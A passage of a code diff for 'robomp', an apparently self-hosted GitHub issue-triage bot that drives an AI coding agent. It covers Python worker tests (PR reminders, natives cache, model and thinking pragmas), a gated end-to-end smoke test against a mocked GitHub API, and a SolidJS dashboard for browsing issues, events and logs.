-> None: + self._tool_end_callbacks = getattr(self, "_tool_end_callbacks", []) + self._tool_end_callbacks.append(cb) + + _FakeRpcClient.on_tool_execution_end = _record_tool_end # type: ignore[assignment] + try: + _FakeRpcClient.on_prompt = staticmethod(_on_prompt) # type: ignore[attr-defined] + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="kickoff", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + finally: + _FakeRpcClient.on_tool_execution_end = original_on_tool_end # type: ignore[assignment] + delattr(_FakeRpcClient, "on_prompt") + + fake = _FakeRpcClient.instances[0] + # kickoff + 1 reminder; second reminder NOT sent because gh_open_pr fired. + assert len(fake.prompts) == 2, fake.prompts + + +@pytest.mark.asyncio +async def test_run_rpc_skips_reminder_for_non_pr_classification(tmp_path: Path, settings: Settings) -> None: + """`question` classified turns are not enforced — no reminder.""" + inputs, bindings = _make_inputs_with_classification(tmp_path, settings, classification="question") + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="kickoff", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + fake = _FakeRpcClient.instances[0] + assert len(fake.prompts) == 1 + + +@pytest.mark.asyncio +async def test_run_rpc_skips_reminder_when_unclassified(tmp_path: Path, settings: Settings) -> None: + """No classification (agent quit before classify_issue) → no reminder.""" + inputs, bindings = _make_inputs_with_classification(tmp_path, settings, classification=None) + loop = asyncio.new_event_loop() + try: + worker._run_rpc_blocking( + inputs, + task_kind="triage_issue", + prompt="kickoff", + loop=loop, + bindings=bindings, # type: ignore[arg-type] + ) + finally: + loop.close() + fake = _FakeRpcClient.instances[0] + assert len(fake.prompts) == 1 + + +# --------------------------------------------------------------------------- +# Natives-cache capture-on-success +# --------------------------------------------------------------------------- + + +class _RecordingNativesCache: + """Test double for `NativesCache`: records `capture` calls, optionally + raises so we can verify exception swallowing.""" + + def __init__(self, *, raise_on_capture: bool = False) -> None: + self.capture_calls: list[tuple[str, str, Path]] = [] + self.raise_on_capture = raise_on_capture + + def capture(self, repo: str, key: str, native_dir: Path, **_kwargs) -> Path | None: + self.capture_calls.append((repo, key, native_dir)) + if self.raise_on_capture: + raise RuntimeError("simulated cache failure") + return native_dir + + +def _make_capture_inputs( + tmp_path: Path, + settings: Settings, + *, + cache: _RecordingNativesCache | None, + with_native_artifacts: bool, +) -> worker.TaskInputs: + """Build a `TaskInputs` whose workspace optionally has built natives.""" + inputs, _ = _make_inputs(tmp_path, settings, session_has_jsonl=False) + # Replace the SimpleNamespace workspace with one carrying the fields + # `_capture_natives_cache` needs (workspace_key + repo_full_name). + ws = SimpleNamespace( + root=inputs.workspace.root, + session_dir=inputs.workspace.session_dir, + repo_dir=inputs.workspace.repo_dir, + branch=inputs.workspace.branch, + workspace_key="acme__widgets__1", + repo_full_name="acme/widgets", + ) + if with_native_artifacts: + native_dir = ws.repo_dir / "packages" / "natives" / "native" + native_dir.mkdir(parents=True) + (native_dir / "pi_natives.linux-arm64.node").write_bytes(b"ELFx") + (native_dir / "index.d.ts").write_text("") + (native_dir / "index.js").write_text("") + (native_dir / "embedded-addon.js").write_text("") + return worker.TaskInputs( + settings=settings, + db=inputs.db, + github=inputs.github, + git_transport=inputs.git_transport, + repo=inputs.repo, + issue=inputs.issue, + workspace=ws, # type: ignore[arg-type] + delivery_id=inputs.delivery_id, + attempts=inputs.attempts, + slot_uid=inputs.slot_uid, + natives_cache=cache, # type: ignore[arg-type] + ) + + +def test_capture_natives_cache_no_op_without_cache(tmp_path: Path, settings: Settings) -> None: + inputs = _make_capture_inputs(tmp_path, settings, cache=None, with_native_artifacts=True) + # Just must not raise. + worker._capture_natives_cache(inputs) + + +def test_capture_natives_cache_skips_without_artifacts(tmp_path: Path, settings: Settings) -> None: + cache = _RecordingNativesCache() + inputs = _make_capture_inputs(tmp_path, settings, cache=cache, with_native_artifacts=False) + worker._capture_natives_cache(inputs) + # No artifacts → no key compute, no capture. + assert cache.capture_calls == [] + + +def test_capture_natives_cache_swallows_key_compute_failure( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + cache = _RecordingNativesCache() + inputs = _make_capture_inputs(tmp_path, settings, cache=cache, with_native_artifacts=True) + # Repo dir is not a git repo → natives_compute_key raises. + # Already true for the SimpleNamespace workspace (repo_dir is plain tmp dir). + worker._capture_natives_cache(inputs) + assert cache.capture_calls == [] + + +def test_capture_natives_cache_swallows_capture_exception( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + cache = _RecordingNativesCache(raise_on_capture=True) + inputs = _make_capture_inputs(tmp_path, settings, cache=cache, with_native_artifacts=True) + # Bypass git: stub the key compute so capture is reached. + monkeypatch.setattr(worker, "natives_compute_key", lambda _repo_dir: "deadbeef") + # Must not propagate the RuntimeError. + worker._capture_natives_cache(inputs) + assert len(cache.capture_calls) == 1 + + +def test_capture_natives_cache_records_on_success( + tmp_path: Path, settings: Settings, monkeypatch: pytest.MonkeyPatch +) -> None: + cache = _RecordingNativesCache() + inputs = _make_capture_inputs(tmp_path, settings, cache=cache, with_native_artifacts=True) + monkeypatch.setattr(worker, "natives_compute_key", lambda _repo_dir: "cafef00d") + worker._capture_natives_cache(inputs) + assert len(cache.capture_calls) == 1 + repo, key, native_dir = cache.capture_calls[0] + assert repo == "acme/widgets" + assert key == "cafef00d" + assert native_dir == inputs.workspace.repo_dir / "packages" / "natives" / "native" diff --git a/python/robomp/tests/test_worker_pragmas.py b/python/robomp/tests/test_worker_pragmas.py new file mode 100644 index 000000000..3c98eb260 --- /dev/null +++ b/python/robomp/tests/test_worker_pragmas.py @@ -0,0 +1,80 @@ +"""Worker-side pragma resolution: model + thinking overrides.""" + +from __future__ import annotations + +import pytest + +from robomp.config import Settings, reset_settings_cache +from robomp.worker import DirectiveInfo, _resolve_pragma_overrides + + +@pytest.fixture +def settings_with_pool(monkeypatch: pytest.MonkeyPatch, env: dict[str, str]) -> Settings: + monkeypatch.setenv( + "ROBOMP_MODEL", + "anthropic/claude-sonnet-4-6,openai/gpt-5.5,openai/gpt-5.5-mini", + ) + reset_settings_cache() + return Settings() # type: ignore[call-arg] + + +def test_no_directive_means_no_override(settings_with_pool: Settings) -> None: + assert _resolve_pragma_overrides(None, settings_with_pool) == (None, None) + + +def test_directive_without_pragmas_means_no_override(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run it", author="can1357") + assert _resolve_pragma_overrides(directive, settings_with_pool) == (None, None) + + +def test_model_pragma_resolves_to_pool_entry(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run", author="can1357", pragmas=(("model", "gpt"),)) + model_override, thinking_override = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override == "openai/gpt-5.5" + assert thinking_override is None + + +def test_model_alias_exact_short_name(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run", author="can1357", pragmas=(("model", "gpt-5.5-mini"),)) + model_override, _ = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override == "openai/gpt-5.5-mini" + + +def test_unmatched_model_alias_falls_back_to_random_pick(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run", author="can1357", pragmas=(("model", "qwen"),)) + model_override, _ = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override is None + + +def test_thinking_pragma_normalized(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run", author="can1357", pragmas=(("thinking", "LOW"),)) + model_override, thinking_override = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override is None + assert thinking_override == "low" + + +def test_unknown_thinking_level_dropped(settings_with_pool: Settings) -> None: + directive = DirectiveInfo(body="run", author="can1357", pragmas=(("thinking", "ultra"),)) + _, thinking_override = _resolve_pragma_overrides(directive, settings_with_pool) + assert thinking_override is None + + +def test_both_pragmas_resolved_together(settings_with_pool: Settings) -> None: + directive = DirectiveInfo( + body="run", + author="can1357", + pragmas=(("model", "claude"), ("thinking", "medium")), + ) + model_override, thinking_override = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override == "anthropic/claude-sonnet-4-6" + assert thinking_override == "medium" + + +def test_last_value_wins_for_duplicate_keys(settings_with_pool: Settings) -> None: + directive = DirectiveInfo( + body="run", + author="can1357", + pragmas=(("model", "claude"), ("model", "gpt")), + ) + model_override, _ = _resolve_pragma_overrides(directive, settings_with_pool) + assert model_override == "openai/gpt-5.5" diff --git a/python/robomp/tests/test_worker_smoke.py b/python/robomp/tests/test_worker_smoke.py new file mode 100644 index 000000000..751e2b8ab --- /dev/null +++ b/python/robomp/tests/test_worker_smoke.py @@ -0,0 +1,201 @@ +"""Gated end-to-end smoke test. + +Runs only when ROBOMP_INTEGRATION=1 and `omp` is available on PATH (or via +ROBOMP_OMP_COMMAND). Spins up: + +- a local bare git repo with a trivial failing test, +- a fake GitHub API via httpx.MockTransport that records comments + PRs, +- a real `omp --mode rpc` subprocess driven by `worker.run_task`. + +Asserts that triage_issue produces: +- at least one issue comment, +- one PR matching the body template, +- a pushed branch on the bare repo, +- an `opened` row in sqlite. +""" + +from __future__ import annotations + +import asyncio +import json +import os +import subprocess +from pathlib import Path +from typing import Any + +import httpx +import pytest + +INTEGRATION = os.environ.get("ROBOMP_INTEGRATION") == "1" + +pytestmark = pytest.mark.skipif( + not INTEGRATION, + reason="ROBOMP_INTEGRATION=1 required to run the omp-backed smoke test", +) + + +def _git(cwd: Path, *args: str, check: bool = True) -> subprocess.CompletedProcess[str]: + env = os.environ | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + } + return subprocess.run(["git", *args], cwd=str(cwd), check=check, capture_output=True, text=True, env=env) + + +def _seed_failing_repo(tmp_path: Path) -> Path: + bare = tmp_path / "upstream.git" + bare.mkdir() + _git(bare.parent, "init", "--initial-branch=main", "--bare", str(bare)) + seed = tmp_path / "seed" + seed.mkdir() + _git(seed, "init", "--initial-branch=main") + (seed / "test.js").write_text( + "const assert = require('assert');\n" + "// FIXME: this assertion is wrong; the answer is 4.\n" + "assert.strictEqual(2 + 2, 5);\n" + ) + (seed / "README.md").write_text("toy repo\n") + _git(seed, "add", ".") + _git(seed, "commit", "-m", "init") + _git(seed, "remote", "add", "origin", str(bare)) + _git(seed, "push", "origin", "main") + return bare + + +def test_triage_end_to_end(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: + from robomp.config import Settings, reset_settings_cache + from robomp.db import Database + from robomp.github_client import GitHubClient + from robomp.sandbox import LocalGitTransport, SandboxManager + from robomp.tasks import triage_issue + + bare = _seed_failing_repo(tmp_path) + + monkeypatch.setenv("ROBOMP_GH_PROXY_URL", "http://gh-proxy.invalid:8081") + monkeypatch.setenv("ROBOMP_GH_PROXY_HMAC_KEY", "test-hmac-key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") + monkeypatch.setenv("GITHUB_TOKEN", "") + monkeypatch.setenv("GITHUB_WEBHOOK_SECRET", "secret") + monkeypatch.setenv("ROBOMP_BOT_LOGIN", "robomp-bot") + monkeypatch.setenv("ROBOMP_REPO_ALLOWLIST", "octo/widget") + monkeypatch.setenv("ROBOMP_WORKSPACE_ROOT", str(tmp_path / "workspaces")) + monkeypatch.setenv("ROBOMP_SQLITE_PATH", str(tmp_path / "robomp.sqlite")) + monkeypatch.setenv("ROBOMP_LOG_DIR", str(tmp_path / "logs")) + monkeypatch.setenv("ROBOMP_TASK_TIMEOUT_SECONDS", "300") + reset_settings_cache() + cfg = Settings() # type: ignore[call-arg] + cfg.ensure_paths() + + # Fake GitHub: capture POSTs, serve repo/issue/comments GETs. + comments: list[dict[str, Any]] = [] + prs: list[dict[str, Any]] = [] + next_comment_id = [100] + + def handler(request: httpx.Request) -> httpx.Response: + path = request.url.path + method = request.method + if method == "GET" and path == "/repos/octo/widget": + return httpx.Response( + 200, + json={ + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": str(bare), + "private": False, + }, + ) + if method == "GET" and path == "/repos/octo/widget/issues/1": + return httpx.Response( + 200, + json={ + "number": 1, + "title": "2+2 should be 4", + "body": "Running `node test.js` exits non-zero because the assertion claims 2+2 is 5.", + "state": "open", + "user": {"login": "alice"}, + "labels": [], + }, + ) + if method == "GET" and path == "/repos/octo/widget/issues/1/comments": + return httpx.Response(200, json=comments) + if method == "POST" and path == "/repos/octo/widget/issues/1/comments": + body = json.loads(request.content) + next_comment_id[0] += 1 + comment = { + "id": next_comment_id[0], + "user": {"login": "robomp-bot"}, + "body": body["body"], + "created_at": "now", + } + comments.append(comment) + return httpx.Response(201, json=comment) + if method == "POST" and path == "/repos/octo/widget/pulls": + body = json.loads(request.content) + pr = { + "number": 7, + "html_url": "https://example.invalid/octo/widget/pull/7", + "head": {"ref": body["head"]}, + "base": {"ref": body["base"]}, + "state": "open", + "title": body["title"], + "body": body["body"], + } + prs.append(pr) + return httpx.Response(201, json=pr) + return httpx.Response(404, json={"message": f"unmocked {method} {path}"}) + + transport = httpx.MockTransport(handler) + + payload = { + "action": "opened", + "issue": { + "number": 1, + "title": "2+2 should be 4", + "body": "Running `node test.js` exits non-zero because the assertion claims 2+2 is 5.", + "state": "open", + "user": {"login": "alice"}, + "labels": [], + }, + "repository": { + "full_name": "octo/widget", + "default_branch": "main", + "clone_url": str(bare), + "private": False, + }, + } + + async def _go() -> None: + db = Database(cfg.sqlite_path) + github = GitHubClient("ghp_test", transport=transport) + sandbox = SandboxManager(cfg.workspace_root) + await triage_issue( + settings=cfg, + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + sandbox=sandbox, + payload=payload, + delivery_id="smoke-test", + ) + row = db.get_issue("octo/widget#1") + assert row is not None, "issue row missing" + assert row.state in {"opened"}, f"unexpected state {row.state}" + db.close() + + asyncio.run(_go()) + + assert prs, "no PR opened" + pr = prs[0] + for section in ("## Repro", "## Cause", "## Fix", "## Verification"): + assert section in pr["body"], f"PR body missing {section}" + assert "Fixes #1" in pr["body"] + # Branch should be pushed to the bare repo. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + assert comments, "expected at least one comment" diff --git a/python/robomp/web/index.html b/python/robomp/web/index.html new file mode 100644 index 000000000..d9711357f --- /dev/null +++ b/python/robomp/web/index.html @@ -0,0 +1,19 @@ + + + + + + + + robomp + + + +
+ + + + diff --git a/python/robomp/web/package.json b/python/robomp/web/package.json new file mode 100644 index 000000000..1223982b7 --- /dev/null +++ b/python/robomp/web/package.json @@ -0,0 +1,24 @@ +{ + "name": "robomp-web", + "private": true, + "version": "0.1.0", + "type": "module", + "description": "Glassmorphic SolidJS dashboard bundled by Vite and served by robomp's FastAPI app.", + "scripts": { + "dev": "vite", + "build": "vite build", + "preview": "vite preview", + "typecheck": "tsc --noEmit" + }, + "dependencies": { + "solid-js": "catalog:" + }, + "devDependencies": { + "@tailwindcss/vite": "catalog:", + "@types/bun": "catalog:", + "tailwindcss": "catalog:", + "typescript": "^5.7.3", + "vite": "catalog:", + "vite-plugin-solid": "catalog:" + } +} diff --git a/python/robomp/web/src/App.tsx b/python/robomp/web/src/App.tsx new file mode 100644 index 000000000..1b3703fc3 --- /dev/null +++ b/python/robomp/web/src/App.tsx @@ -0,0 +1,52 @@ +import { type JSX, onCleanup, onMount } from "solid-js"; + +import { Browse } from "./components/Browse"; +import { Events } from "./components/Events"; +import { Header } from "./components/Header"; +import { Issues } from "./components/Issues"; +import { Logs } from "./components/Logs"; +import { Stats } from "./components/Stats"; +import { Trigger } from "./components/Trigger"; +import { Working } from "./components/Working"; +import { runTrigger, startPolling, stopPolling } from "./state"; + +export function App(): JSX.Element { + onMount(() => { + startPolling(); + }); + onCleanup(() => { + stopPolling(); + }); + + const handleRetry = (deliveryId: string): void => { + void runTrigger({ mode: "retry", delivery_id: deliveryId }); + }; + + return ( +
+
+ +
+
+ + +
+ + + +
+ + +
+ + + + + +
+ robomp · self-hosted triage & fix · polling every 3s +
+
+
+ ); +} diff --git a/python/robomp/web/src/api.ts b/python/robomp/web/src/api.ts new file mode 100644 index 000000000..6c85d702e --- /dev/null +++ b/python/robomp/web/src/api.ts @@ -0,0 +1,84 @@ +import { AUTH_HEADERS } from "./config"; +import type { + BrowseResponse, + CancelResponse, + LogsResponse, + StatusResponse, + TriggerResponse, +} from "./types"; + +export class ApiError extends Error { + readonly status: number; + constructor(status: number, message: string) { + super(message); + this.status = status; + this.name = "ApiError"; + } +} + +function extractDetail(body: unknown): string | null { + if (body == null || typeof body !== "object") return null; + const detail = (body as Record).detail; + if (typeof detail === "string") return detail; + const message = (body as Record).message; + if (typeof message === "string") return message; + return null; +} + +async function unwrap(resp: Response): Promise { + let body: unknown = null; + try { + body = await resp.json(); + } catch { + // Endpoint returned non-JSON. For 2xx that's still valid for callers that + // expect an empty body; we only surface the parse failure on errors. + } + if (!resp.ok) { + const detail = extractDetail(body) ?? resp.statusText ?? `HTTP ${resp.status}`; + throw new ApiError(resp.status, detail); + } + return body as T; +} + +function authHeaders(): Record { + return { ...AUTH_HEADERS }; +} + +function jsonHeaders(): Record { + return { "Content-Type": "application/json", ...AUTH_HEADERS }; +} + +export const api = { + status(signal?: AbortSignal): Promise { + return fetch("/api/status", { signal }).then(unwrap); + }, + logs(limit = 400, signal?: AbortSignal): Promise { + return fetch(`/api/logs?limit=${limit}`, { signal }).then(unwrap); + }, + browse(state: string, refresh = false, signal?: AbortSignal): Promise { + const qs = new URLSearchParams({ state, limit: "50" }); + if (refresh) qs.set("refresh", "1"); + return fetch(`/api/github/issues?${qs.toString()}`, { + headers: authHeaders(), + signal, + }).then(unwrap); + }, + trigger(body: { + mode: "triage" | "retry"; + issue?: string; + delivery_id?: string; + }): Promise { + return fetch("/api/trigger", { + method: "POST", + headers: jsonHeaders(), + body: JSON.stringify(body), + }).then(unwrap); + }, + cancel(deliveryId: string): Promise { + return fetch("/api/cancel", { + method: "POST", + headers: jsonHeaders(), + body: JSON.stringify({ delivery_id: deliveryId }), + }).then(unwrap); + }, +}; diff --git a/python/robomp/web/src/components/Browse.tsx b/python/robomp/web/src/components/Browse.tsx new file mode 100644 index 000000000..5cf047f64 --- /dev/null +++ b/python/robomp/web/src/components/Browse.tsx @@ -0,0 +1,220 @@ +import { + createMemo, + createResource, + createSignal, + For, + type JSX, + type ResourceReturn, + Show, +} from "solid-js"; + +import { ApiError, api } from "../api"; +import { CONFIG } from "../config"; +import { fmtAge } from "../format"; +import { runTrigger } from "../state"; +import type { BrowseResponse } from "../types"; +import { GlassCard } from "./GlassCard"; +import { Pill } from "./Pill"; + +interface BrowseQuery { + state: string; + refreshCount: number; +} + +const EMPTY_RESPONSE: BrowseResponse = { + issues: [], + errors: [], + repos: [], + cache: { hit: false, fetched_at: 0 }, +}; + +export function Browse(): JSX.Element { + const [state, setState] = createSignal("open"); + const [refreshCount, setRefreshCount] = createSignal(0); + const [filter, setFilter] = createSignal(""); + const [hideProcessed, setHideProcessed] = createSignal(true); + + const fetchBrowse = async (query: BrowseQuery): Promise => { + return api.browse(query.state, query.refreshCount > 0); + }; + + const tuple: ResourceReturn = createResource( + () => ({ state: state(), refreshCount: refreshCount() }), + fetchBrowse, + ); + const [browseResource] = tuple; + + const data = createMemo(() => browseResource.latest ?? EMPTY_RESPONSE); + + const filtered = createMemo(() => { + const all = data().issues; + const needle = filter().trim().toLowerCase(); + const hidden = hideProcessed(); + const list = hidden ? all.filter((i) => !i.processed) : all; + if (!needle) return list; + return list.filter((i) => `${i.repo} ${i.title} #${i.number}`.toLowerCase().includes(needle)); + }); + + const processedCount = createMemo(() => data().issues.filter((i) => i.processed).length); + + const errorMessage = (): string | null => { + const err = browseResource.error; + if (!err) return null; + if (err instanceof ApiError) return `error ${err.status}: ${err.message}`; + if (err instanceof Error) return err.message; + return String(err); + }; + + const meta = (): string => { + const d = data(); + const totalRepos = d.repos.length ? d.repos.join(", ") : "(allowlist empty)"; + const ageSeconds = + d.cache.fetched_at > 0 ? Math.max(0, (Date.now() - d.cache.fetched_at * 1000) / 1000) : 0; + const cacheInfo = + d.cache.fetched_at > 0 + ? ` · ${d.cache.hit ? "cached" : "loaded"} ${ageSeconds.toFixed(0)}s ago` + : ""; + const hidden = + hideProcessed() && processedCount() > 0 ? ` · ${processedCount()} processed hidden` : ""; + return `${filtered().length}/${d.issues.length} from ${totalRepos}${cacheInfo}${hidden}`; + }; + + const triggerFor = (mode: "triage" | "retry", repo: string, number: number): void => { + void runTrigger({ mode, issue: `${repo}#${number}` }); + }; + + return ( + {meta()}}> + + issue browser disabled — same gate as the trigger surface. + + } + > +
+ + setFilter(ev.currentTarget.value)} + /> + + +
+ + +
+ {errorMessage()} +
+
+ + + + {(err) => ( +
+ {err.repo} {err.error} +
+ )} +
+
+ +
+ + {hideProcessed() && + processedCount() > 0 && + processedCount() === data().issues.length + ? `all ${processedCount()} issues already processed — uncheck "hide processed" to see them` + : "no issues"} +
+ } + > + + {(issue) => ( +
+
+ +
+ {issue.state} + + + processed + + + by {issue.author || "—"} + updated {fmtAge(issue.updated_at)} + {issue.comments} comments + {(label) => {label}} +
+
+
+ + +
+
+ )} +
+
+ + +
+ ); +} diff --git a/python/robomp/web/src/components/Events.tsx b/python/robomp/web/src/components/Events.tsx new file mode 100644 index 000000000..1d9144210 --- /dev/null +++ b/python/robomp/web/src/components/Events.tsx @@ -0,0 +1,84 @@ +import { For, type JSX, Show } from "solid-js"; + +import { CONFIG } from "../config"; +import { fmtAge, splitIssueKey } from "../format"; +import { statusResource } from "../state"; +import type { RecentEvent } from "../types"; +import { GlassCard } from "./GlassCard"; +import { IssueLink } from "./IssueLink"; +import { Pill } from "./Pill"; + +export interface EventsProps { + onRetry: (deliveryId: string) => void; +} + +export function Events(props: EventsProps): JSX.Element { + const events = (): RecentEvent[] => statusResource()?.recent_events ?? []; + + return ( + {events().length}}> + no events recorded yet}> +
+ + + + + + + + + + + + + + {(event) => } + + +
receivedeventwherestatetrieserror +
+
+
+
+ ); +} + +interface RowProps { + event: RecentEvent; + onRetry: (deliveryId: string) => void; +} + +function EventRow(props: RowProps): JSX.Element { + const ref = (): { repo: string; number: string } => splitIssueKey(props.event.issue_key); + const canRetry = (): boolean => props.event.state === "failed" || props.event.state === "done"; + + return ( + + {fmtAge(props.event.received_at)} + {props.event.event_type} + + {props.event.repo ?? "—"}} + > + + + + + {props.event.state} + + {props.event.attempts} + {props.event.last_error ?? ""} + + —} + > + + + + + ); +} diff --git a/python/robomp/web/src/components/GlassCard.tsx b/python/robomp/web/src/components/GlassCard.tsx new file mode 100644 index 000000000..841c99e19 --- /dev/null +++ b/python/robomp/web/src/components/GlassCard.tsx @@ -0,0 +1,31 @@ +import type { JSX } from "solid-js"; + +export interface GlassCardProps { + heading?: string; + accessory?: JSX.Element; + class?: string; + contentClass?: string; + bare?: boolean; + children: JSX.Element; + style?: JSX.CSSProperties; +} + +// Single glass surface used for every section card. The `bare` variant skips +// the inset content padding so tables/log lists can reach the edge. +export function GlassCard(props: GlassCardProps): JSX.Element { + const cls = (): string => { + const base = "glass glass-rise rounded-[22px] overflow-hidden"; + return props.class ? `${base} ${props.class}` : base; + }; + return ( +
+ {props.heading != null && ( +
+

{props.heading}

+ {props.accessory &&
{props.accessory}
} +
+ )} +
{props.children}
+
+ ); +} diff --git a/python/robomp/web/src/components/Header.tsx b/python/robomp/web/src/components/Header.tsx new file mode 100644 index 000000000..3215b2809 --- /dev/null +++ b/python/robomp/web/src/components/Header.tsx @@ -0,0 +1,106 @@ +import { type JSX, Show } from "solid-js"; + +import { CONFIG } from "../config"; +import { fmtDuration } from "../format"; +import { isFetching, lastTickAt, lastTickError, statusResource } from "../state"; +import type { RuntimeInfo } from "../types"; + +function relativeAgo(ms: number): string { + const seconds = Math.max(0, (Date.now() - ms) / 1000); + if (seconds < 5) return "just now"; + return `${fmtDuration(seconds)} ago`; +} + +export function Header(): JSX.Element { + const runtime = (): RuntimeInfo | undefined => statusResource()?.runtime; + + return ( +
+
+
+

+ robomp + +

+ triage · fix · ship +
+ +
+ + + {isFetching() ? "syncing…" : `synced ${relativeAgo(lastTickAt())}`} + + } + > + + + {lastTickError()} + + +
+
+ +
+ + + + + + + read-only · trigger disabled + +
+
+ ); +} + +interface MetaProps { + label: string; + value?: string; + mono?: boolean; + title?: string; +} + +function Meta(props: MetaProps): JSX.Element { + return ( + + {props.label} + + {props.value ?? "…"} + + + ); +} diff --git a/python/robomp/web/src/components/IssueLink.tsx b/python/robomp/web/src/components/IssueLink.tsx new file mode 100644 index 000000000..1ac5b3acc --- /dev/null +++ b/python/robomp/web/src/components/IssueLink.tsx @@ -0,0 +1,44 @@ +import type { JSX } from "solid-js"; + +import { issueUrl, prUrl } from "../format"; + +export interface IssueLinkProps { + repo: string; + number: number | string; +} + +export function IssueLink(props: IssueLinkProps): JSX.Element { + return ( + + {props.repo} + # + {props.number} + + ); +} + +export interface PrLinkProps { + repo: string; + number: number | string | null | undefined; +} + +export function PrLink(props: PrLinkProps): JSX.Element { + if (props.number == null || props.number === "") { + return —; + } + return ( + + #{props.number} + + ); +} diff --git a/python/robomp/web/src/components/Issues.tsx b/python/robomp/web/src/components/Issues.tsx new file mode 100644 index 000000000..7e0fec646 --- /dev/null +++ b/python/robomp/web/src/components/Issues.tsx @@ -0,0 +1,117 @@ +import { For, type JSX, Show } from "solid-js"; + +import { CONFIG } from "../config"; +import { fmtAge, shortText } from "../format"; +import { statusResource } from "../state"; +import { type IssueRow, type LatestEvent, TERMINAL_ISSUE_STATES } from "../types"; +import { GlassCard } from "./GlassCard"; +import { IssueLink, PrLink } from "./IssueLink"; +import { Pill } from "./Pill"; + +export interface IssuesProps { + onRetry: (deliveryId: string) => void; +} + +export function Issues(props: IssuesProps): JSX.Element { + const active = (): IssueRow[] => { + const s = statusResource(); + if (!s) return []; + return s.issues.filter((i) => !TERMINAL_ISSUE_STATES.has(i.state)); + }; + + return ( + {active().length}}> + no active issues}> +
+ + + + + + + + + + + + + + + {(issue) => } + + +
issuestatelast eventclassbranchprerror +
+
+
+
+ ); +} + +interface RowProps { + issue: IssueRow; + onRetry: (deliveryId: string) => void; +} + +function IssueRowView(props: RowProps): JSX.Element { + const ev = (): LatestEvent | null => props.issue.latest_event; + + return ( + + + + + + {props.issue.state} + + + —}> + {(latest) => ( + <> + {latest().state} + + {latest().event_type} · attempt #{latest().attempts} ·{" "} + {fmtAge(latest().received_at)} + + + )} + + + {props.issue.classification ?? ""} + + {props.issue.branch ? ( + {props.issue.branch} + ) : ( + — + )} + + + + + + —} + > + {shortText(ev()?.last_error)} + + + + —} + > + + + + + ); +} diff --git a/python/robomp/web/src/components/Logs.tsx b/python/robomp/web/src/components/Logs.tsx new file mode 100644 index 000000000..49d49fbfd --- /dev/null +++ b/python/robomp/web/src/components/Logs.tsx @@ -0,0 +1,168 @@ +import { createEffect, createSignal, For, type JSX, Show } from "solid-js"; + +import { fmtTimestamp } from "../format"; +import { logsResource } from "../state"; +import { LEVEL_ORDER, type LogEntry } from "../types"; +import { GlassCard } from "./GlassCard"; + +const RESERVED_LOG_FIELDS = new Set(["ts", "level", "logger", "msg", "exc"]); + +interface Extra { + key: string; + value: string; +} + +interface FormattedRow { + index: number; + ts: string; + level: string; + logger: string; + message: string; + extras: Extra[]; + exc: string | null; +} + +function formatExtraValue(value: unknown): string { + if (value == null) return ""; + if (typeof value === "string") return value; + if (typeof value === "number" || typeof value === "boolean") { + return String(value); + } + try { + return JSON.stringify(value); + } catch { + return String(value); + } +} + +function buildExtras(entry: LogEntry): Extra[] { + const out: Extra[] = []; + for (const [key, value] of Object.entries(entry)) { + if (RESERVED_LOG_FIELDS.has(key)) continue; + out.push({ key, value: formatExtraValue(value) }); + } + return out; +} + +export function Logs(): JSX.Element { + const [level, setLevel] = createSignal("INFO"); + const [filter, setFilter] = createSignal(""); + const [follow, setFollow] = createSignal(true); + + let scrollEl: HTMLDivElement | undefined; + + const allEntries = (): LogEntry[] => logsResource()?.entries ?? []; + + const rows = (): FormattedRow[] => { + const wantLevel = level(); + const minOrd = wantLevel ? (LEVEL_ORDER[wantLevel] ?? 0) : 0; + const needle = filter().trim().toLowerCase(); + const out: FormattedRow[] = []; + let index = 0; + for (const entry of allEntries()) { + const lvl = entry.level ?? "INFO"; + if ((LEVEL_ORDER[lvl] ?? 20) < minOrd) continue; + const msg = entry.msg ?? ""; + const extras = buildExtras(entry); + if (needle) { + const haystack = ( + msg + + " " + + extras.map((e) => `${e.key}=${e.value}`).join(" ") + ).toLowerCase(); + if (!haystack.includes(needle)) continue; + } + out.push({ + index: index++, + ts: fmtTimestamp(entry.ts), + level: lvl, + logger: entry.logger ?? "", + message: msg, + extras, + exc: entry.exc ?? null, + }); + } + return out; + }; + + createEffect(() => { + // Touch dependencies so effect re-runs on new data / toggles. + rows(); + if (follow() && scrollEl) { + scrollEl.scrollTop = scrollEl.scrollHeight; + } + }); + + return ( + + {rows().length} / {allEntries().length} + + } + > +
+ + + +
+
(scrollEl = el)}> + no log entries match
}> + + {(row) => ( +
+ {row.ts} + {row.level} + {row.logger} + + {row.message} + + + + {(extra) => ( + + {" "} + {extra.key}={extra.value} + + )} + + + + + {row.exc} + + +
+ )} +
+ + +
